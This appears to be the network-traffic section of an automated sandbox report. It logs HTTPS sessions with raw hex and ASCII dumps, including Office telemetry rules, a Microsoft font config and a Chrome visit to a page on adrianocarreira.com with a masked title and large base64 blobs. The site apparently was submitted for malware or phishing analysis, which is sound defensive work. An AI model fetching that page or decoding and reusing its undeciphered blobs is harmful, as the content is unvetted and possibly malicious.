                                                  2024-11-27 17:09:33 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                  Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                  2024-11-27 17:09:33 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                  Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                  2024-11-27 17:09:33 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                  2024-11-27 17:09:33 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                  Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.64971094.46.167.2184435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:33 UTC677OUTGET /team/index.html HTTP/1.1
                                                  Host: adrianocarreira.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:09:33 UTC208INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:35 GMT
                                                  Server: Apache
                                                  Last-Modified: Wed, 27 Nov 2024 15:25:42 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 353581
                                                  Connection: close
                                                  Content-Type: text/html
                                                  2024-11-27 17:09:33 UTC7984INData Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 2a 2a 2a 2a 2d 2d 2d 2a 2a 2a 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 53 65 67 6f 65 20 55 49
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>****---***</title> <style> body { font-family: "Segoe UI", "Segoe UI
                                                  2024-11-27 17:09:33 UTC8000INData Raw: 47 50 61 45 4a 47 54 33 78 55 36 74 68 59 32 43 62 37 6f 65 66 72 47 64 44 44 55 66 5a 31 53 63 48 41 4c 77 47 31 53 47 44 62 38 65 70 75 63 31 34 49 4b 58 62 46 6a 51 71 44 32 35 44 58 2b 2f 48 79 6a 55 71 2b 73 47 44 47 73 2f 50 4c 78 37 48 6a 46 30 79 68 63 6a 45 4b 45 76 66 5a 4a 69 68 4b 50 49 73 55 66 6a 37 62 66 35 42 4d 56 31 6f 65 4c 46 50 53 78 37 61 46 2b 32 48 44 4d 77 67 58 38 44 54 59 68 64 6e 37 38 32 2f 6e 62 71 33 47 4c 6b 63 2b 4a 4f 46 36 59 63 6c 6e 36 53 76 53 79 64 53 73 64 59 48 65 42 75 69 4f 44 7a 66 78 64 7a 48 4f 59 4b 71 44 5a 42 46 4a 39 73 38 62 58 5a 6b 74 4c 48 43 41 46 6a 4c 4a 74 4b 55 57 4a 64 54 4e 70 47 2b 62 31 37 32 76 53 37 67 35 39 33 33 33 65 46 50 6a 31 55 79 42 75 44 43 4e 2f 2b 72 74 68 73 78 36 5a 49 68 51 6e
                                                  Data Ascii: GPaEJGT3xU6thY2Cb7oefrGdDDUfZ1ScHALwG1SGDb8epuc14IKXbFjQqD25DX+/HyjUq+sGDGs/PLx7HjF0yhcjEKEvfZJihKPIsUfj7bf5BMV1oeLFPSx7aF+2HDMwgX8DTYhdn782/nbq3GLkc+JOF6Ycln6SvSydSsdYHeBuiODzfxdzHOYKqDZBFJ9s8bXZktLHCAFjLJtKUWJdTNpG+b172vS7g59333eFPj1UyBuDCN/+rthsx6ZIhQn
                                                  2024-11-27 17:09:34 UTC8000INData Raw: 38 6f 78 63 78 73 2f 66 30 74 71 66 52 32 61 76 32 64 35 55 2b 41 50 53 59 48 51 2b 65 6c 44 6b 56 7a 4a 62 31 53 4d 6f 6f 49 56 4c 42 35 46 68 6b 63 48 65 61 49 69 50 70 4c 74 78 59 69 75 55 4f 46 50 56 39 68 72 6f 65 68 62 46 66 68 47 78 58 7a 31 30 35 68 37 72 47 45 4a 45 75 79 72 38 49 73 45 41 34 55 30 66 30 69 53 76 64 65 2b 70 41 42 37 72 59 77 31 64 5a 6a 33 45 61 5a 69 48 41 56 6c 4d 71 68 36 77 34 33 6e 35 71 41 52 6a 69 66 6d 49 63 65 7a 58 4a 74 42 4b 61 31 34 4f 4c 37 6c 57 6f 42 6a 65 48 34 2f 4f 4f 42 4f 79 63 49 45 5a 4d 56 37 46 37 4e 55 73 48 6a 76 62 66 4d 68 63 5a 78 78 4f 6e 49 69 55 5a 78 77 47 6d 51 38 68 53 4b 46 37 34 45 51 74 36 4d 6f 41 5a 4a 53 67 70 4a 39 74 50 4c 39 6d 6e 41 39 62 69 31 6d 4e 6e 56 63 61 75 49 51 58 68 7a 39
                                                  Data Ascii: 8oxcxs/f0tqfR2av2d5U+APSYHQ+elDkVzJb1SMooIVLB5FhkcHeaIiPpLtxYiuUOFPV9hroehbFfhGxXz105h7rGEJEuyr8IsEA4U0f0iSvde+pAB7rYw1dZj3EaZiHAVlMqh6w43n5qARjifmIcezXJtBKa14OL7lWoBjeH4/OOBOycIEZMV7F7NUsHjvbfMhcZxxOnIiUZxwGmQ8hSKF74EQt6MoAZJSgpJ9tPL9mnA9bi1mNnVcauIQXhz9
                                                  2024-11-27 17:09:34 UTC8000INData Raw: 73 5a 56 69 51 39 7a 46 31 69 4d 74 6f 4d 6a 46 47 4a 73 62 50 38 69 56 79 61 67 37 4e 4e 43 6d 67 6d 45 53 42 68 65 45 58 78 33 66 51 45 62 44 70 56 38 72 4d 68 30 38 59 57 76 72 6a 75 4e 6e 77 30 75 4b 52 78 72 34 77 44 62 31 34 44 39 35 4f 76 36 4a 48 4d 47 2f 47 6c 4c 32 58 36 6e 37 51 6a 73 61 68 77 4c 47 2f 34 52 76 4e 35 6a 33 78 54 34 78 42 53 49 69 48 54 75 55 66 42 42 30 76 49 78 37 57 48 50 36 50 56 4d 2b 6b 46 73 4b 31 53 67 43 49 48 76 56 49 79 69 78 53 68 55 2f 47 34 55 4c 32 61 42 77 6f 73 57 65 4a 72 69 4d 65 66 6f 69 79 63 70 38 72 56 50 46 70 63 67 57 53 56 78 2f 69 66 6d 77 34 2b 4c 57 74 32 34 39 70 68 51 75 6c 51 37 53 48 42 5a 6f 36 31 79 76 67 53 69 48 34 33 4f 32 47 47 47 41 34 4f 48 61 68 44 4a 2f 75 4a 52 69 39 2b 64 55 4c 56 42
                                                  Data Ascii: sZViQ9zF1iMtoMjFGJsbP8iVyag7NNCmgmESBheEXx3fQEbDpV8rMh08YWvrjuNnw0uKRxr4wDb14D95Ov6JHMG/GlL2X6n7QjsahwLG/4RvN5j3xT4xBSIiHTuUfBB0vIx7WHP6PVM+kFsK1SgCIHvVIyixShU/G4UL2aBwosWeJriMefoiycp8rVPFpcgWSVx/ifmw4+LWt249phQulQ7SHBZo61yvgSiH43O2GGGA4OHahDJ/uJRi9+dULVB
                                                  2024-11-27 17:09:34 UTC8000INData Raw: 61 51 54 69 58 32 4d 75 65 37 31 31 69 63 31 6a 4d 32 55 2f 6d 39 66 41 5a 57 46 69 6a 55 47 33 2b 68 75 79 66 48 68 68 6c 37 63 35 4a 75 76 42 4c 52 39 33 43 78 4f 2b 4f 39 30 44 36 4e 41 41 5a 2f 6c 5a 4e 4f 76 59 54 43 58 51 33 68 31 72 32 39 42 6f 39 35 41 47 79 4a 7a 33 41 6a 6f 33 6c 4c 79 54 2f 32 2b 45 37 34 57 31 4d 69 39 71 53 32 34 55 71 6d 44 33 2f 67 4c 62 51 74 75 55 39 63 38 72 44 4f 79 6e 41 55 55 50 6b 57 31 6f 54 71 57 7a 31 52 33 57 4c 2b 71 44 59 42 74 77 51 69 6a 5a 38 44 4f 78 34 6e 55 4b 73 43 38 69 5a 39 38 64 33 6d 4f 64 6f 34 50 71 47 42 52 64 4b 78 4d 73 36 37 54 77 4d 50 37 45 33 35 71 62 49 73 48 47 39 63 4c 42 7a 39 6c 74 65 4b 47 4d 51 2f 59 76 2f 78 6a 2f 2b 4a 2f 75 74 45 63 4a 4b 78 30 42 57 46 4d 51 53 62 76 4b 49 51 41
                                                  Data Ascii: aQTiX2Mue711ic1jM2U/m9fAZWFijUG3+huyfHhhl7c5JuvBLR93CxO+O90D6NAAZ/lZNOvYTCXQ3h1r29Bo95AGyJz3Ajo3lLyT/2+E74W1Mi9qS24UqmD3/gLbQtuU9c8rDOynAUUPkW1oTqWz1R3WL+qDYBtwQijZ8DOx4nUKsC8iZ98d3mOdo4PqGBRdKxMs67TwMP7E35qbIsHG9cLBz9lteKGMQ/Yv/xj/+J/utEcJKx0BWFMQSbvKIQA
                                                  2024-11-27 17:09:34 UTC8000INData Raw: 47 77 4e 34 31 52 72 4a 79 59 43 74 47 44 74 4f 48 6a 77 2b 50 2b 4b 35 35 6e 75 56 62 79 4e 2f 32 54 74 66 45 4c 4e 2b 51 46 79 45 79 54 30 6c 68 6a 69 37 6c 35 4a 69 48 44 49 42 55 7a 54 5a 37 68 73 50 38 59 75 5a 74 42 4f 64 74 6a 33 37 51 39 65 2f 63 58 2f 37 4b 38 56 46 78 45 55 63 46 44 31 6a 6a 5a 6a 57 78 4b 74 4f 32 63 63 63 63 78 43 6c 57 30 4a 73 56 52 6f 4b 4b 6d 62 34 7a 52 52 34 75 4a 52 6c 6b 6f 54 45 48 44 35 77 53 6d 4a 61 30 77 46 63 35 58 4a 63 61 33 4f 51 7a 4b 52 51 47 7a 55 72 69 59 32 6a 4b 75 55 53 33 4e 47 42 32 47 36 70 4e 42 4b 4b 2b 76 75 66 58 66 36 76 49 68 45 44 79 50 54 78 31 43 46 70 44 50 2f 4e 59 47 2f 56 4f 71 34 71 45 46 47 74 35 4f 48 62 47 4f 38 6e 4b 75 4f 43 77 63 45 61 33 42 77 5a 57 42 74 42 58 45 47 70 4c 78 62
                                                  Data Ascii: GwN41RrJyYCtGDtOHjw+P+K55nuVbyN/2TtfELN+QFyEyT0lhji7l5JiHDIBUzTZ7hsP8YuZtBOdtj37Q9e/cX/7K8VFxEUcFD1jjZjWxKtO2ccccxClW0JsVRoKKmb4zRR4uJRlkoTEHD5wSmJa0wFc5XJca3OQzKRQGzUriY2jKuUS3NGB2G6pNBKK+vufXf6vIhEDyPTx1CFpDP/NYG/VOq4qEFGt5OHbGO8nKuOCwcEa3BwZWBtBXEGpLxb
                                                  2024-11-27 17:09:34 UTC8000INData Raw: 2b 2f 50 42 65 70 51 61 48 6b 36 39 54 58 6e 4c 78 66 4c 53 39 6e 54 66 7a 44 41 62 47 67 45 6b 4b 54 49 77 68 61 43 59 31 4c 35 57 43 43 62 6d 31 4e 63 31 41 37 73 53 77 47 55 46 55 32 75 53 51 4a 2b 36 6a 6c 72 49 62 30 6f 63 4f 6b 32 43 37 5a 36 54 65 6a 2b 46 4f 66 44 38 61 59 48 6e 68 73 7a 69 64 38 5a 33 31 79 73 33 75 74 59 62 59 79 77 4b 6e 77 59 64 69 74 76 4f 7a 34 5a 4e 2b 77 6b 56 49 73 4c 64 6f 6b 39 48 42 63 62 33 68 57 41 64 72 59 4f 49 41 65 69 42 33 6b 57 73 77 34 76 46 6e 53 48 59 30 6f 41 38 4e 4f 34 6a 57 2b 58 54 58 76 53 6c 57 52 59 64 62 2f 7a 41 53 45 52 70 76 73 4e 6d 53 79 74 30 2f 78 41 67 59 79 39 68 34 66 55 49 65 47 5a 5a 47 52 75 7a 57 79 39 2b 37 33 69 48 79 4d 51 44 31 34 39 6a 4e 4d 30 70 44 70 55 76 75 44 66 6c 6d 31 66
                                                  Data Ascii: +/PBepQaHk69TXnLxfLS9nTfzDAbGgEkKTIwhaCY1L5WCCbm1Nc1A7sSwGUFU2uSQJ+6jlrIb0ocOk2C7Z6Tej+FOfD8aYHnhszid8Z31ys3utYbYywKnwYditvOz4ZN+wkVIsLdok9HBcb3hWAdrYOIAeiB3kWsw4vFnSHY0oA8NO4jW+XTXvSlWRYdb/zASERpvsNmSyt0/xAgYy9h4fUIeGZZGRuzWy9+73iHyMQD149jNM0pDpUvuDflm1f
                                                  2024-11-27 17:09:34 UTC8000INData Raw: 67 63 39 5a 76 42 53 4f 77 39 5a 44 4c 67 78 74 61 66 74 7a 4c 67 41 46 69 41 4e 38 76 30 62 51 69 74 6d 6c 6e 75 35 34 38 6c 76 41 31 6d 79 4b 57 35 39 44 6d 51 49 48 45 35 34 50 49 7a 68 48 6d 4e 7a 69 41 6b 6f 47 4c 7a 44 58 54 38 2f 34 45 35 30 6d 4a 61 6f 7a 59 71 39 58 53 37 57 44 5a 51 69 57 35 61 66 48 74 73 38 74 6c 6b 35 6e 75 78 32 67 31 2b 37 71 39 37 58 44 63 53 6c 52 68 67 35 32 61 76 6a 62 2f 38 6d 52 63 31 44 4b 41 32 72 66 73 48 41 44 41 68 44 4d 6f 50 64 70 68 31 6e 48 4f 2b 79 4d 57 68 6c 62 72 4c 7a 58 58 57 4e 77 4e 51 41 65 50 57 33 42 7a 2b 32 6b 77 76 5a 4b 2f 74 42 59 52 72 47 52 76 59 6d 4f 44 6a 34 70 49 6e 6e 78 7a 59 43 7a 56 50 32 58 50 56 36 39 37 33 35 64 74 77 38 34 4f 51 48 46 77 2f 6b 55 38 4c 2f 6c 6a 67 55 2f 42 7a 30
                                                  Data Ascii: gc9ZvBSOw9ZDLgxtaftzLgAFiAN8v0bQitmlnu548lvA1myKW59DmQIHE54PIzhHmNziAkoGLzDXT8/4E50mJaozYq9XS7WDZQiW5afHts8tlk5nux2g1+7q97XDcSlRhg52avjb/8mRc1DKA2rfsHADAhDMoPdph1nHO+yMWhlbrLzXXWNwNQAePW3Bz+2kwvZK/tBYRrGRvYmODj4pInnxzYCzVP2XPV69735dtw84OQHFw/kU8L/ljgU/Bz0
                                                  2024-11-27 17:09:34 UTC8000INData Raw: 41 38 6f 67 5a 62 6c 62 50 61 45 6b 6a 74 54 6a 72 35 6a 71 65 5a 67 50 38 4c 36 6b 31 78 30 62 46 42 49 74 58 69 71 62 64 7a 6c 65 45 70 31 38 4e 54 32 71 44 70 76 39 32 42 47 35 48 70 44 6e 57 4a 33 7a 64 4f 38 39 2b 6d 38 54 2f 54 41 55 72 70 72 55 75 7a 50 5a 2f 30 76 64 79 55 39 4a 34 77 52 32 6a 74 69 72 34 70 7a 32 47 76 6f 39 2b 52 4d 38 2b 6d 7a 6a 69 65 34 38 78 67 33 49 6d 53 6c 31 78 64 35 61 36 4c 59 52 47 76 4d 2b 4d 57 79 4f 36 55 46 33 30 50 69 68 74 64 61 32 75 43 63 4d 2b 53 35 65 61 6a 4f 77 57 6c 4c 61 48 34 4a 75 45 59 54 4b 41 53 63 56 50 4d 51 56 55 76 57 61 73 30 32 74 34 32 4b 55 67 64 66 31 78 34 51 65 39 31 30 6e 55 2f 47 5a 66 36 78 48 72 6a 66 6a 7a 78 77 67 55 48 55 4e 58 65 37 6b 75 69 6a 79 74 33 6f 48 76 45 65 31 2f 55 38
                                                  Data Ascii: A8ogZblbPaEkjtTjr5jqeZgP8L6k1x0bFBItXiqbdzleEp18NT2qDpv92BG5HpDnWJ3zdO89+m8T/TAUrprUuzPZ/0vdyU9J4wR2jtir4pz2Gvo9+RM8+mzjie48xg3ImSl1xd5a6LYRGvM+MWyO6UF30Pihtda2uCcM+S5eajOwWlLaH4JuEYTKAScVPMQVUvWas02t42KUgdf1x4Qe910nU/GZf6xHrjfjzxwgUHUNXe7kuijyt3oHvEe1/U8
                                                  2024-11-27 17:09:34 UTC8000INData Raw: 65 36 71 44 72 72 56 79 66 79 69 2b 47 66 65 2f 61 58 44 2f 2f 6a 33 66 33 47 64 6f 46 38 42 70 64 43 6e 57 36 4d 4a 33 78 51 56 78 32 48 70 50 75 62 66 46 37 75 42 31 39 42 65 4b 38 65 59 30 52 47 35 51 37 4d 69 66 77 37 49 72 44 65 76 6f 57 62 46 57 67 62 72 73 42 58 62 57 49 72 2f 39 66 30 43 32 6d 73 75 78 77 4d 31 75 69 78 71 59 77 36 4b 6d 65 42 4c 31 2b 7a 4b 6d 64 51 56 54 6f 73 33 66 4d 47 50 6c 79 79 64 64 47 6c 4d 77 48 44 35 6e 4c 4d 71 59 48 5a 5a 56 71 66 31 46 41 77 37 4c 75 36 43 37 39 33 35 4a 39 4b 70 42 59 6e 55 63 63 44 7a 36 54 4b 75 61 32 68 38 57 56 75 2f 56 6e 7a 70 63 50 37 5a 33 63 71 73 65 30 6d 66 6a 50 62 39 57 77 37 4f 70 53 37 69 66 47 36 6b 77 48 36 79 46 42 4e 50 31 4f 7a 34 5a 44 6e 65 33 76 47 79 57 48 50 62 75 2b 56 61
                                                  Data Ascii: e6qDrrVyfyi+Gfe/aXD//j3f3GdoF8BpdCnW6MJ3xQVx2HpPubfF7uB19BeK8eY0RG5Q7Mifw7IrDevoWbFWgbrsBXbWIr/9f0C2msuxwM1uixqYw6KmeBL1+zKmdQVTos3fMGPlyyddGlMwHD5nLMqYHZZVqf1FAw7Lu6C7935J9KpBYnUccDz6TKua2h8WVu/VnzpcP7Z3cqse0mfjPb9Ww7OpS7ifG6kwH6yFBNP1Oz4ZDne3vGyWHPbu+Va


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.649711184.28.90.27443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:33 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                  Range: bytes=0-2147483646
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-11-27 17:09:34 UTC515INHTTP/1.1 200 OK
                                                  ApiVersion: Distribute 1.1
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  Content-Type: application/octet-stream
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  Server: ECAcc (lpl/EF06)
                                                  X-CID: 11
                                                  X-Ms-ApiVersion: Distribute 1.2
                                                  X-Ms-Region: prod-weu-z1
                                                  Cache-Control: public, max-age=119416
                                                  Date: Wed, 27 Nov 2024 17:09:34 GMT
                                                  Content-Length: 55
                                                  Connection: close
                                                  X-CID: 2
                                                  2024-11-27 17:09:34 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.64970994.46.167.2184435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:34 UTC609OUTGET /favicon.ico HTTP/1.1
                                                  Host: adrianocarreira.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://adrianocarreira.com/team/index.html
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-11-27 17:09:35 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Wed, 27 Nov 2024 17:09:37 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-11-27 17:09:35 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5192.168.2.64971313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:09:35 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:09:36 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:09:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 3788
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                  ETag: "0x8DC582BAC2126A6"
                                                  x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T170935Z-174f7845968ljs8phC1EWRe6en0000000x1g00000000fez2
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
